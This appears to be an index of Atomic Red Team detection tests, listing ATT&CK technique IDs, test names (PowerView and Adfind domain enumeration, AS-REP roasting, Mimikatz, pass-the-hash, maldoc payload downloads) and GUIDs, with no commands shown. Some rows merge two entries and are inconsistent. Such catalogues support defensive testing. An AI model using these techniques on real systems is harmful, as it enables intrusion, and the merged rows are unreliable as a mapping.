476 impact T1496 Resource Hijacking 1 macOS/Linux - Simulate CPU Load with Yes 904a5a0e-fb02-490d-9f8d-0e256eb37549 bash
477 impact T1489 Service Stop 1 Windows - Stop service using Service Controller 21dfb440-830d-4c86-a3e5-2a491d5a8d04 command_prompt
478 impact T1489 Service Stop 2 Windows - Stop service using net.exe 41274289-ec9c-4213-bea4-e43c4aa57954 command_prompt
490 discovery T1217 Browser Bookmark Discovery 1 List Mozilla Firefox Bookmark Database Files on Linux 3a41f169-a5ab-407f-9269-abafdb5da6c2 sh
491 discovery T1217 Browser Bookmark Discovery 2 List Mozilla Firefox Bookmark Database Files on macOS 1ca1f9c7-44bc-46bb-8c85-c50e2e94267b sh
492 discovery T1217 Browser Bookmark Discovery 3 List Google Chrome Bookmark JSON Files on macOS b789d341-154b-4a42-a071-9111588be9bc sh
493 discovery T1217 Browser Bookmark Discovery 4 List Google Chrome / Opera Bookmarks on Windows with powershell List Google Chrome Bookmarks on Windows with powershell faab755e-4299-48ec-8202-fc7885eb6545 powershell
494 discovery T1217 Browser Bookmark Discovery 5 List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt 76f71e2f-480e-4bed-b61e-398fe17499d5 command_prompt
495 discovery T1217 Browser Bookmark Discovery 6 List Mozilla Firefox bookmarks on Windows with command prompt 4312cdbc-79fc-4a9c-becc-53d49c734bc5 command_prompt
496 discovery T1217 Browser Bookmark Discovery 7 List Internet Explorer Bookmarks using the command prompt 727dbcdb-e495-4ab1-a6c4-80c7f77aef85 command_prompt
discovery T1217 Browser Bookmark Discovery 8 List Safari Bookmarks on MacOS 5fc528dd-79de-47f5-8188-25572b7fafe0 sh
497 discovery T1087.002 Domain Account 1 Enumerate all accounts (Domain) 6fbc9e68-5ad7-444a-bd11-8bf3136c477e command_prompt
498 discovery T1087.002 Domain Account 2 Enumerate all accounts via PowerShell (Domain) 8b8a6449-be98-4f42-afd2-dedddc7453b2 powershell
499 discovery T1087.002 Domain Account 3 Enumerate logged on users via CMD (Domain) 161dcd85-d014-4f5e-900c-d3eaae82a0f7 command_prompt
500 discovery T1087.002 Domain Account 4 Automated AD Recon (ADRecon) 95018438-454a-468c-a0fa-59c800149b59 powershell
501 discovery T1087.002 Domain Account 5 Adfind -Listing password policy 736b4f53-f400-4c22-855d-1a6b5a551600 command_prompt powershell
discovery T1087.002 Domain Account 6 Adfind - Enumerate Active Directory Admins b95fd967-4e62-4109-b48d-265edfd28c3a command_prompt
discovery T1087.002 Domain Account 7 Adfind - Enumerate Active Directory User Objects e1ec8d20-509a-4b9a-b820-06c9b2da8eb7 command_prompt
discovery T1087.002 Domain Account 8 Adfind - Enumerate Active Directory Exchange AD Objects 5e2938fb-f919-47b6-8b29-2f6a1f718e99 command_prompt
discovery T1087.002 Domain Account 9 Enumerate Default Domain Admin Details (Domain) c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef command_prompt
discovery T1087.002 Domain Account 10 Enumerate Active Directory for Unconstrained Delegation 46f8dbe9-22a5-4770-8513-66119c5be63b powershell
discovery T1087.002 Domain Account 11 Get-DomainUser with PowerView 93662494-5ed7-4454-a04c-8c8372808ac2 powershell
discovery T1087.002 Domain Account 12 Enumerate Active Directory Users with ADSISearcher 02e8be5a-3065-4e54-8cc8-a14d138834d3 powershell
discovery T1087.002 Domain Account 13 Enumerate Linked Policies In ADSISearcher Discovery 7ab0205a-34e4-4a44-9b04-e1541d1a57be powershell
discovery T1087.002 Domain Account 14 Enumerate Root Domain linked policies Discovery 00c652e2-0750-4ca6-82ff-0204684a6fe4 powershell
502 discovery T1069.002 Domain Groups 1 Basic Permission Groups Discovery Windows (Domain) dd66d77d-8998-48c0-8024-df263dc2ce5d command_prompt
503 discovery T1069.002 Domain Groups 2 Permission Groups Discovery PowerShell (Domain) 6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7 powershell
504 discovery T1069.002 Domain Groups 3 Elevated group enumeration using net group (Domain) 0afb5163-8181-432e-9405-4322710c0c37 command_prompt
506 discovery T1069.002 Domain Groups 5 Find local admins on all machines in domain (PowerView) a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd powershell
507 discovery T1069.002 Domain Groups 6 Find Local Admins via Group Policy (PowerView) 64fdb43b-5259-467a-b000-1b02c00e510a powershell
508 discovery T1069.002 Domain Groups 7 Enumerate Users Not Requiring Pre Auth (ASRepRoast) 870ba71e-6858-4f6d-895c-bb6237f6121b powershell
discovery T1069.002 Domain Groups 8 Adfind - Query Active Directory Groups 48ddc687-82af-40b7-8472-ff1e742e8274 command_prompt
discovery T1069.002 Domain Groups 9 Enumerate Active Directory Groups with Get-AdGroup 3d1fcd2a-e51c-4cbe-8d84-9a843bad8dc8 powershell
discovery T1069.002 Domain Groups 10 Enumerate Active Directory Groups with ADSISearcher 9f4e344b-8434-41b3-85b1-d38f29d148d0 powershell
discovery T1069.002 Domain Groups 11 Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting) 43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8 powershell
discovery T1069.002 Domain Groups 12 Get-DomainGroupMember with PowerView 46352f40-f283-4fe5-b56d-d9a71750e145 powershell
discovery T1069.002 Domain Groups 13 Get-DomainGroup with PowerView 5a8a181c-2c8e-478d-a943-549305a01230 powershell
509 discovery T1482 Domain Trust Discovery 1 Windows - Discover domain trusts with dsquery 4700a710-c821-4e17-a3ec-9e4c81d6845f command_prompt
510 discovery T1482 Domain Trust Discovery 2 Windows - Discover domain trusts with nltest 2e22641d-0498-48d2-b9ff-c71e496ccdbe command_prompt
511 discovery T1482 Domain Trust Discovery 3 Powershell enumerate domains and forests c58fbc62-8a62-489e-8f2d-3565d7d96f30 powershell
discovery T1482 Domain Trust Discovery 4 Adfind - Enumerate Active Directory OUs d1c73b96-ab87-4031-bad8-0e1b3b8bf3ec command_prompt
discovery T1482 Domain Trust Discovery 5 Adfind - Enumerate Active Directory Trusts 15fe436d-e771-4ff3-b655-2dca9ba52834 command_prompt
discovery T1482 Domain Trust Discovery 6 Get-DomainTrust with PowerView f974894c-5991-4b19-aaf5-7cc2fe298c5d powershell
discovery T1482 Domain Trust Discovery 7 Get-ForestTrust with PowerView 58ed10e8-0738-4651-8408-3a3e9a526279 powershell
512 discovery T1083 File and Directory Discovery 1 File and Directory Discovery (cmd.exe) 0e36303b-6762-4500-b003-127743b80ba6 command_prompt
513 discovery T1083 File and Directory Discovery 2 File and Directory Discovery (PowerShell) 2158908e-b7ef-4c21-8a83-3ce4dd05a924 powershell
514 discovery T1083 File and Directory Discovery 3 Nix File and Directory Discovery Nix File and Diectory Discovery ffc8b249-372a-4b74-adcd-e4c0430842de sh
515 discovery T1083 File and Directory Discovery 4 Nix File and Directory Discovery 2 13c5e1ae-605b-46c4-a79f-db28c77ff24e sh
discovery T1083 File and Directory Discovery 5 Simulating MAZE Directory Enumeration c6c34f61-1c3e-40fb-8a58-d017d88286d8 powershell
discovery T1615 Group Policy Discovery 1 Display group policy information via gpresult 0976990f-53b1-4d3f-a185-6df5be429d3b command_prompt
discovery T1615 Group Policy Discovery 2 Get-DomainGPO to display group policy information via PowerView 4e524c4e-0e02-49aa-8df5-93f3f7959b9f powershell
516 discovery T1087.001 Local Account 1 Enumerate all accounts (Local) f8aab3dd-5990-4bf8-b8ab-2226c951696f sh
517 discovery T1087.001 Local Account 2 View sudoers access fed9be70-0186-4bde-9f8a-20945f9370c2 sh
518 discovery T1087.001 Local Account 3 View accounts with UID 0 c955a599-3653-4fe5-b631-f11c00eb0397 sh
523 discovery T1087.001 Local Account 8 Enumerate all accounts on Windows (Local) 80887bec-5a9b-4efc-a81d-f83eb2eb32ab command_prompt
524 discovery T1087.001 Local Account 9 Enumerate all accounts via PowerShell (Local) ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b powershell
525 discovery T1087.001 Local Account 10 Enumerate logged on users via CMD (Local) a138085e-bfe5-46ba-a242-74a6fb884af3 command_prompt
526 discovery T1087.001 Local Account 11 Enumerate logged on users via PowerShell 2bdc42c7-8907-40c2-9c2b-42919a00fe03 powershell
527 discovery T1069.001 Local Groups 1 Permission Groups Discovery (Local) 952931a4-af0b-4335-bbbe-73c8c5b327ae sh
528 discovery T1069.001 Local Groups 2 Basic Permission Groups Discovery Windows (Local) 1f454dd6-e134-44df-bebb-67de70fb6cd8 command_prompt
529 discovery T1069.001 Local Groups 3 Permission Groups Discovery PowerShell (Local) a580462d-2c19-4bc7-8b9a-57a41b7d3ba4 powershell
discovery T1069.001 Local Groups 4 SharpHound3 - LocalAdmin e03ada14-0980-4107-aff1-7783b2b59bb1 powershell
discovery T1069.001 Local Groups 5 Wmic Group Discovery 7413be50-be8e-430f-ad4d-07bf197884b2 powershell
discovery T1069.001 Local Groups 6 WMIObject Group Discovery 69119e58-96db-4110-ad27-954e48f3bb13 powershell
530 discovery T1046 Network Service Scanning 1 Port Scan 68e907da-2539-48f6-9fc9-257a78c05540 sh
531 discovery T1046 Network Service Scanning 2 Port Scan Nmap 515942b0-a09f-4163-a7bb-22fefb6f185f sh
532 discovery T1046 Network Service Scanning 3 Port Scan NMap for Windows d696a3cb-d7a8-4976-8eb5-5af4abf2e3df powershell
discovery T1046 Network Service Scanning 4 Port Scan using python 6ca45b04-9f15-4424-b9d3-84a217285a5c powershell
533 discovery T1135 Network Share Discovery 1 Network Share Discovery f94b5ad9-911c-4eff-9718-fd21899db4f7 sh
534 discovery T1135 Network Share Discovery 2 Network Share Discovery - linux Network Share Discovery command prompt 875805bc-9e86-4e87-be86-3a5527315cae 20f1097d-81c1-405c-8380-32174d493bbb bash command_prompt
535 discovery T1135 Network Share Discovery 3 Network Share Discovery command prompt Network Share Discovery PowerShell 20f1097d-81c1-405c-8380-32174d493bbb 1b0814d1-bb24-402d-9615-1b20c50733fb command_prompt powershell
536 discovery T1135 Network Share Discovery 4 Network Share Discovery PowerShell View available share drives 1b0814d1-bb24-402d-9615-1b20c50733fb ab39a04f-0c93-4540-9ff2-83f862c385ae powershell command_prompt
537 discovery T1135 Network Share Discovery 5 View available share drives Share Discovery with PowerView ab39a04f-0c93-4540-9ff2-83f862c385ae b1636f0a-ba82-435c-b699-0d78794d8bfd command_prompt powershell
discovery T1135 Network Share Discovery 6 Share Discovery with PowerView b1636f0a-ba82-435c-b699-0d78794d8bfd powershell
discovery T1135 Network Share Discovery 7 PowerView ShareFinder d07e4cc1-98ae-447e-9d31-36cb430d28c4 powershell
538 discovery T1040 Network Sniffing 1 Packet Capture Linux 7fe741f7-b265-4951-a7c7-320889083b3e bash
539 discovery T1040 Network Sniffing 2 Packet Capture macOS 9d04efee-eff5-4240-b8d2-07792b873608 bash
540 discovery T1040 Network Sniffing 3 Packet Capture Windows Command Prompt a5b2f6a0-24b4-493e-9590-c699f75723ca command_prompt
546 discovery T1201 Password Policy Discovery 5 Examine local password policy - Windows 4588d243-f24e-4549-b2e3-e627acc089f6 command_prompt
547 discovery T1201 Password Policy Discovery 6 Examine domain password policy - Windows 46c2c362-2679-4ef5-aec9-0e958e135be4 command_prompt
548 discovery T1201 Password Policy Discovery 7 Examine password policy - macOS 4b7fa042-9482-45e1-b348-4b756b2a0742 bash
discovery T1201 Password Policy Discovery 8 Get-DomainPolicy with PowerView 3177f4da-3d4b-4592-8bdc-aa23d0b2e843 powershell
discovery T1201 Password Policy Discovery 9 Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy b2698b33-984c-4a1c-93bb-e4ba72a0babb powershell
discovery T1120 Peripheral Device Discovery 1 Win32_PnPEntity Hardware Inventory 2cb4dbf2-2dca-4597-8678-4d39d207a3a5 powershell
549 discovery T1057 Process Discovery 1 Process Discovery - ps 4ff64f0b-aaf2-4866-b39d-38d9791407cc sh
550 discovery T1057 Process Discovery 2 Process Discovery - tasklist c5806a4f-62b8-4900-980b-c7ec004e9908 command_prompt
discovery T1057 Process Discovery 3 Process Discovery - Get-Process 3b3809b6-a54b-4f5b-8aff-cb51f2e97b34 powershell
discovery T1057 Process Discovery 4 Process Discovery - get-wmiObject b51239b4-0129-474f-a2b4-70f855b9f2c2 powershell
discovery T1057 Process Discovery 5 Process Discovery - wmic process 640cbf6d-659b-498b-ba53-f6dd1a1cc02c command_prompt
551 discovery T1012 Query Registry 1 Query Registry 8f7578c4-9863-4d83-875c-a565573bbdf0 command_prompt
552 discovery T1018 Remote System Discovery 1 Remote System Discovery - net 85321a9c-897f-4a60-9f20-29788e50bccd command_prompt
553 discovery T1018 Remote System Discovery 2 Remote System Discovery - net group Domain Computers f1bf6c8f-9016-4edf-aff9-80b65f5d711f command_prompt
558 discovery T1018 Remote System Discovery 7 Remote System Discovery - sweep 96db2632-8417-4dbb-b8bb-a8b92ba391de sh
559 discovery T1018 Remote System Discovery 8 Remote System Discovery - nslookup baa01aaa-5e13-45ec-8a0d-e46c93c9760f powershell
560 discovery T1018 Remote System Discovery 9 Remote System Discovery - adidnsdump 95e19466-469e-4316-86d2-1dc401b5a959 command_prompt
discovery T1018 Remote System Discovery 10 Adfind - Enumerate Active Directory Computer Objects a889f5be-2d54-4050-bd05-884578748bb4 command_prompt
discovery T1018 Remote System Discovery 11 Adfind - Enumerate Active Directory Domain Controller Objects 5838c31e-a0e2-4b9f-b60a-d79d2cb7995e command_prompt
discovery T1018 Remote System Discovery 12 Remote System Discovery - ip neighbour 158bd4dd-6359-40ab-b13c-285b9ef6fa25 sh
discovery T1018 Remote System Discovery 13 Remote System Discovery - ip route 1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1 sh
discovery T1018 Remote System Discovery 14 Remote System Discovery - ip tcp_metrics 6c2da894-0b57-43cb-87af-46ea3b501388 sh
discovery T1018 Remote System Discovery 15 Enumerate domain computers within Active Directory using DirectorySearcher 962a6017-1c09-45a6-880b-adc9c57cb22e powershell
discovery T1018 Remote System Discovery 16 Enumerate Active Directory Computers with Get-AdComputer 97e89d9e-e3f5-41b5-a90f-1e0825df0fdf powershell
discovery T1018 Remote System Discovery 17 Enumerate Active Directory Computers with ADSISearcher 64ede6ac-b57a-41c2-a7d1-32c6cd35397d powershell
discovery T1018 Remote System Discovery 18 Get-DomainController with PowerView b9d2e8ca-5520-4737-8076-4f08913da2c4 powershell
discovery T1018 Remote System Discovery 19 Get-wmiobject to Enumerate Domain Controllers e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad powershell
561 discovery T1518.001 Security Software Discovery 1 Security Software Discovery f92a380f-ced9-491f-b338-95a991418ce2 command_prompt
562 discovery T1518.001 Security Software Discovery 2 Security Software Discovery - powershell 7f566051-f033-49fb-89de-b6bacab730f0 powershell
563 discovery T1518.001 Security Software Discovery 3 Security Software Discovery - ps (macOS) ba62ce11-e820-485f-9c17-6f3c857cd840 sh
566 discovery T1518.001 Security Software Discovery 6 Security Software Discovery - AV Discovery via WMI 1553252f-14ea-4d3b-8a08-d7a4211aa945 command_prompt
567 discovery T1518 Software Discovery 1 Find and Display Internet Explorer Browser Version 68981660-6670-47ee-a5fa-7e74806420a4 command_prompt
568 discovery T1518 Software Discovery 2 Applications Installed c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b powershell
569 discovery T1518 Software Discovery 3 Find and Display Safari Browser Version 103d6533-fd2a-4d08-976a-4a598565280f sh command_prompt
570 discovery T1497.001 System Checks 1 Detect Virtualization Environment (Linux) dfbd1a21-540d-4574-9731-e852bd6fe840 sh
571 discovery T1497.001 System Checks 2 Detect Virtualization Environment (Windows) 502a7dc4-9d6f-4d28-abf2-f0e84692562d powershell
572 discovery T1497.001 System Checks 3 Detect Virtualization Environment (MacOS) a960185f-aef6-4547-8350-d1ce16680d09 sh
discovery T1497.001 System Checks 4 Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) 4a41089a-48e0-47aa-82cb-5b81a463bc78 powershell
573 discovery T1082 System Information Discovery 1 System Information Discovery 66703791-c902-4560-8770-42b8a91f7667 command_prompt
574 discovery T1082 System Information Discovery 2 System Information Discovery edff98ec-0f73-4f63-9890-6b117092aff6 sh
575 discovery T1082 System Information Discovery 3 List OS Information cccb070c-df86-4216-a5bc-9fb60c74e27c sh
578 discovery T1082 System Information Discovery 6 Hostname Discovery (Windows) 85cfbf23-4a1e-4342-8792-007e004b975f command_prompt
579 discovery T1082 System Information Discovery 7 Hostname Discovery 486e88ea-4f56-470f-9b57-3f4d73f39133 bash
580 discovery T1082 System Information Discovery 8 Windows MachineGUID Discovery 224b4daf-db44-404e-b6b2-f4d1f0126ef8 command_prompt
discovery T1082 System Information Discovery 9 Griffon Recon 69bd4abe-8759-49a6-8d21-0f15822d6370 powershell
discovery T1082 System Information Discovery 10 Environment variables discovery on windows f400d1c0-1804-4ff8-b069-ef5ddd2adbf3 command_prompt
discovery T1082 System Information Discovery 11 Environment variables discovery on macos and linux fcbdd43f-f4ad-42d5-98f3-0218097e2720 sh
discovery T1082 System Information Discovery 12 Show System Integrity Protection status (MacOS) 327cc050-9e99-4c8e-99b5-1d15f2fb6b96 sh
discovery T1614.001 System Language Discovery 1 Discover System Language by Registry Query 631d4cf1-42c9-4209-8fe9-6bd4de9421be command_prompt
discovery T1614.001 System Language Discovery 2 Discover System Language with chcp d91473ca-944e-477a-b484-0e80217cd789 command_prompt
581 discovery T1016 System Network Configuration Discovery 1 System Network Configuration Discovery on Windows 970ab6a1-0157-4f3f-9a73-ec4166754b23 command_prompt
582 discovery T1016 System Network Configuration Discovery 2 List Windows Firewall Rules 038263cb-00f4-4b0a-98ae-0696c67e1752 command_prompt
583 discovery T1016 System Network Configuration Discovery 3 System Network Configuration Discovery c141bbdb-7fca-4254-9fd6-f47e79447e17 sh
584 discovery T1016 System Network Configuration Discovery 4 System Network Configuration Discovery (TrickBot Style) dafaf052-5508-402d-bf77-51e0700c02e2 command_prompt
585 discovery T1016 System Network Configuration Discovery 5 List Open Egress Ports 4b467538-f102-491d-ace7-ed487b853bf5 powershell
586 discovery T1016 System Network Configuration Discovery 6 Adfind - Enumerate Active Directory Subnet Objects List macOS Firewall Rules 9bb45dd7-c466-4f93-83a1-be30e56033ee ff1d8c25-2aa4-4f18-a425-fede4a41ee88 command_prompt bash
discovery T1016 System Network Configuration Discovery 7 Qakbot Recon 121de5c6-5818-4868-b8a7-8fd07c455c1b command_prompt
discovery T1016 System Network Configuration Discovery 8 List macOS Firewall Rules ff1d8c25-2aa4-4f18-a425-fede4a41ee88 bash
587 discovery T1049 System Network Connections Discovery 1 System Network Connections Discovery 0940a971-809a-48f1-9c4d-b1d785e96ee5 command_prompt
588 discovery T1049 System Network Connections Discovery 2 System Network Connections Discovery with PowerShell f069f0f1-baad-4831-aa2b-eddac4baac4a powershell
589 discovery T1049 System Network Connections Discovery 3 System Network Connections Discovery Linux & MacOS 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2 sh
discovery T1049 System Network Connections Discovery 4 System Discovery using SharpView 96f974bb-a0da-4d87-a744-ff33e73367e9 powershell
590 discovery T1033 System Owner/User Discovery 1 System Owner/User Discovery 4c4959bf-addf-4b4a-be86-8d09cc1857aa command_prompt
591 discovery T1033 System Owner/User Discovery 2 System Owner/User Discovery 2a9b677d-a230-44f4-ad86-782df1ef108c sh
592 discovery T1033 System Owner/User Discovery 3 Find computers where user has session - Stealth mode (PowerView) 29857f27-a36f-4f7e-8084-4557cd6207ca powershell
discovery T1033 System Owner/User Discovery 4 User Discovery With Env Vars PowerShell Script dcb6cdee-1fb0-4087-8bf8-88cfd136ba51 powershell
discovery T1033 System Owner/User Discovery 5 GetCurrent User with PowerShell Script 1392bd0f-5d5a-429e-81d9-eb9d4d4d5b3b powershell
593 discovery T1007 System Service Discovery 1 System Service Discovery 89676ba1-b1f8-47ee-b940-2e1a113ebc71 command_prompt
594 discovery T1007 System Service Discovery 2 System Service Discovery - net.exe 5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3 command_prompt
discovery T1007 System Service Discovery 3 System Service Discovery - systemctl f4b26bce-4c2c-46c0-bcc5-fce062d38bef bash
595 discovery T1124 System Time Discovery 1 System Time Discovery 20aba24b-e61f-4b26-b4ce-4784f763ca20 command_prompt
596 discovery T1124 System Time Discovery 2 System Time Discovery - PowerShell 1d5711d6-655c-4a47-ae9c-6503c74fa877 powershell
discovery T1124 System Time Discovery 3 System Time Discovery in macOS f449c933-0891-407f-821e-7916a21a1a6f sh
597 execution T1059.002 AppleScript 1 AppleScript 3600d97d-81b9-4171-ab96-e4386506e2c2 sh
598 execution T1053.001 At (Linux) 1 At - Schedule a job 7266d898-ac82-4ec0-97c7-436075d0d08e sh
599 execution T1053.002 At (Windows) 1 At.exe Scheduled task 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8 command_prompt
execution T1609 Container Administration Command 1 ExecIntoContainer d03bfcd3-ed87-49c8-8880-44bb772dea4b bash
execution T1053.007 Container Orchestration Job 1 ListCronjobs ddfb0bc1-3c3f-47e9-a298-550ecfefacbd bash
execution T1053.007 Container Orchestration Job 2 CreateCronjob f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 bash
600 execution T1053.003 Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 bash
601 execution T1053.003 Cron 2 Cron - Add script to all cron subfolders Cron - Add script to cron folder b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
execution T1053.003 Cron 3 Cron - Add script to /var/spool/cron/crontabs/ folder 2d943c18-e74a-44bf-936f-25ade6cccab4 bash
602 execution T1559.002 Dynamic Data Exchange 1 Execute Commands f592ba2a-e9e8-4d62-a459-ef63abd819fd manual
603 execution T1559.002 Dynamic Data Exchange 2 Execute PowerShell script via Word DDE 47c21fb6-085e-4b0d-b4d2-26d72c3830b3 command_prompt
604 execution T1559.002 Dynamic Data Exchange 3 DDEAUTO cf91174c-4e74-414e-bec0-8d60a104d181 manual
608 execution T1204.002 Malicious File 2 OSTap Payload Download 3f3af983-118a-4fa1-85d3-ba4daa739d80 command_prompt
609 execution T1204.002 Malicious File 3 Maldoc choice flags command execution 0330a5d2-a45a-4272-a9ee-e364411c4b18 powershell
610 execution T1204.002 Malicious File 4 OSTAP JS version add560ef-20d6-4011-a937-2c340f930911 powershell
execution T1204.002 Malicious File 5 Office launching .bat file from AppData 9215ea92-1ded-41b7-9cd6-79f9a78397aa powershell
execution T1204.002 Malicious File 6 Excel 4 Macro 4ea1fc97-8a46-4b4e-ba48-af43d2a98052 powershell
execution T1204.002 Malicious File 7 Headless Chrome code execution via VBA a19ee671-ed98-4e9d-b19c-d1954a51585a powershell
execution T1204.002 Malicious File 8 Potentially Unwanted Applications (PUA) 02f35d62-9fdc-4a97-b899-a5d9a876d295 powershell
execution T1204.002 Malicious File 9 Office Generic Payload Download 5202ee05-c420-4148-bf5e-fd7f7d24850c powershell
611 execution T1106 Native API 1 Execution through API - CreateProcess 99be2089-c52d-4a4a-b5c3-261ee42c8b62 command_prompt
612 execution T1059.001 PowerShell 1 Mimikatz f3132740-55bc-48c4-bcc0-758a459cd027 command_prompt
613 execution T1059.001 PowerShell 2 Run BloodHound from local disk a21bb23e-e677-4ee7-af90-6931b57b6350 powershell
623 execution T1059.001 PowerShell 12 PowerShell Downgrade Attack 9148e7c4-9356-420e-a416-e896e9c0f73e powershell
624 execution T1059.001 PowerShell 13 NTFS Alternate Data Stream Access 8e5c5532-1181-4c1d-bb79-b3a9f5dbd680 powershell
625 execution T1059.001 PowerShell 14 PowerShell Session Creation and Use 7c1acec2-78fa-4305-a3e0-db2a54cddecd powershell
execution T1059.001 PowerShell 15 ATHPowerShellCommandLineParameter -Command parameter variations 686a9785-f99b-41d4-90df-66ed515f81d7 powershell
execution T1059.001 PowerShell 16 ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments 1c0a870f-dc74-49cf-9afc-eccc45e58790 powershell
execution T1059.001 PowerShell 17 ATHPowerShellCommandLineParameter -EncodedCommand parameter variations 86a43bad-12e3-4e85-b97c-4d5cf25b95c3 powershell
execution T1059.001 PowerShell 18 ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments 0d181431-ddf3-4826-8055-2dbf63ae848b powershell
execution T1059.001 PowerShell 19 PowerShell Command Execution a538de64-1c74-46ed-aa60-b995ed302598 command_prompt
execution T1059.001 PowerShell 20 PowerShell Invoke Known Malicious Cmdlets 49eb9404-5e0f-4031-a179-b40f7be385e3 powershell
execution T1059.001 PowerShell 21 PowerUp Invoke-AllChecks 1289f78d-22d2-4590-ac76-166737e1811b powershell
execution T1059.006 Python 1 Execute shell script via python's command mode arguement 3a95cdb2-c6ea-4761-b24e-02b71889b8bb sh
execution T1059.006 Python 2 Execute Python via scripts (Linux) 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8 sh
execution T1059.006 Python 3 Execute Python via Python executables (Linux) 0b44d79b-570a-4b27-a31f-3bf2156e5eaa sh
626 execution T1053.005 Scheduled Task 1 Scheduled Task Startup Script fec27f65-db86-4c2d-b66c-61945aee87c2 command_prompt
627 execution T1053.005 Scheduled Task 2 Scheduled task Local 42f53695-ad4a-4546-abb6-7d837f644a71 command_prompt
628 execution T1053.005 Scheduled Task 3 Scheduled task Remote 2e5eac3e-327b-4a88-a0c0-c4057039a8dd command_prompt
629 execution T1053.005 Scheduled Task 4 Powershell Cmdlet Scheduled Task af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd powershell
execution T1053.005 Scheduled Task 5 Task Scheduler via VBA ecd3fa21-7792-41a2-8726-2c5c673414d3 powershell
execution T1053.005 Scheduled Task 6 WMI Invoke-CimMethod Scheduled Task e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b powershell
execution T1053.005 Scheduled Task 7 Scheduled Task Executing Base64 Encoded Commands From Registry e895677d-4f06-49ab-91b6-ae3742d0a2ba command_prompt
630 execution T1569.002 Service Execution 1 Execute a Command as a Service 2382dee2-a75f-49aa-9378-f52df6ed3fb1 command_prompt
631 execution T1569.002 Service Execution 2 Use PsExec to execute a command on a remote host 873106b7-cfed-454b-8680-fa9f6400431c command_prompt
execution T1569.002 Service Execution 3 psexec.py (Impacket) edbcd8c9-3639-4844-afad-455c91e95a35 bash
execution T1072 Software Deployment Tools 1 Radmin Viewer Utility b4988cad-6ed2-434d-ace5-ea2670782129 command_prompt
execution T1053.006 Systemd Timers 1 Create Systemd Service and Timer f4983098-bb13-44fb-9b2c-46149961807b bash
execution T1053.006 Systemd Timers 2 Create a user level transient systemd service and timer 3de33f5b-62e5-4e63-a2a0-6fd8808c80ec sh
execution T1053.006 Systemd Timers 3 Create a system level transient systemd service and timer d3eda496-1fc0-49e9-aff5-3bec5da9fa22 sh
632 execution T1059.004 Unix Shell 1 Create and Execute Bash Shell Script 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873 sh
633 execution T1059.004 Unix Shell 2 Command-Line Interface d0c88567-803d-4dca-99b4-7ce65e7b257c sh
execution T1059.004 Unix Shell 3 Harvest SUID executable files 46274fc6-08a7-4956-861b-24cbbaa0503c sh
execution T1059.004 Unix Shell 4 LinEnum tool execution a2b35a63-9df1-4806-9a4d-5fe0500845f2 sh
634 execution T1059.005 Visual Basic 1 Visual Basic script execution to gather local computer information 1620de42-160a-4fe5-bbaf-d3fef0181ce9 powershell
execution T1059.005 Visual Basic 2 Encoded VBS code execution e8209d5f-e42d-45e6-9c2f-633ac4f1eefa powershell
execution T1059.005 Visual Basic 3 Extract Memory via VBA 8faff437-a114-4547-9a60-749652a03df6 powershell
635 execution T1059.003 Windows Command Shell 1 Create and Execute Batch Script 9e8894c0-50bd-4525-a96c-d4ac78ece388 powershell
execution T1059.003 Windows Command Shell 2 Writes text to a file and displays it. 127b4afe-2346-4192-815c-69042bec570e command_prompt
execution T1059.003 Windows Command Shell 3 Suspicious Execution via Windows Command Shell d0eb3597-a1b3-4d65-b33b-2cda8d397f20 command_prompt
execution T1059.003 Windows Command Shell 4 Simulate BlackByte Ransomware Print Bombing 6b2903ac-8f36-450d-9ad5-b220e8a2dcb9 powershell
636 execution T1047 Windows Management Instrumentation 1 WMI Reconnaissance Users c107778c-dcf5-47c5-af2e-1d058a3df3ea command_prompt
637 execution T1047 Windows Management Instrumentation 2 WMI Reconnaissance Processes 5750aa16-0e59-4410-8b9a-8a47ca2788e2 command_prompt
638 execution T1047 Windows Management Instrumentation 3 WMI Reconnaissance Software 718aebaa-d0e0-471a-8241-c5afa69c7414 command_prompt
639 execution T1047 Windows Management Instrumentation 4 WMI Reconnaissance List Remote Services 0fd48ef7-d890-4e93-a533-f7dedd5191d3 command_prompt
640 execution T1047 Windows Management Instrumentation 5 WMI Execute Local Process b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3 command_prompt
641 execution T1047 Windows Management Instrumentation 6 WMI Execute Remote Process 9c8ef159-c666-472f-9874-90c8d60d136b command_prompt
execution T1047 Windows Management Instrumentation 7 Create a Process using WMI Query and an Encoded Command 7db7a7f9-9531-4840-9b30-46220135441c command_prompt
execution T1047 Windows Management Instrumentation 8 Create a Process using obfuscated Win32_Process 10447c83-fc38-462a-a936-5102363b1c43 powershell
execution T1047 Windows Management Instrumentation 9 WMI Execute rundll32 00738d2a-4651-4d76-adf2-c43a41dfb243 powershell
execution T1047 Windows Management Instrumentation 10 Application uninstall using WMIC c510d25b-1667-467d-8331-a56d3e9bc4ff command_prompt
642 lateral-movement T1021.003 Distributed Component Object Model 1 PowerShell Lateral Movement using MMC20 6dc74eb1-c9d6-4c53-b3b5-6f50ae339673 powershell
643 lateral-movement T1550.002 Pass the Hash 1 Mimikatz Pass the Hash ec23cef9-27d9-46e4-a68d-6f75f7b86908 command_prompt
644 lateral-movement T1550.002 Pass the Hash 2 crackmapexec Pass the Hash eb05b028-16c8-4ad8-adea-6f5b219da9a9 command_prompt
